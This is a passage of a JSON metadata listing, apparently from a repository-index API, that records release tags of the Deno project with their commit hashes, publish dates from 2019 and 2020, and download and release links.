,"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_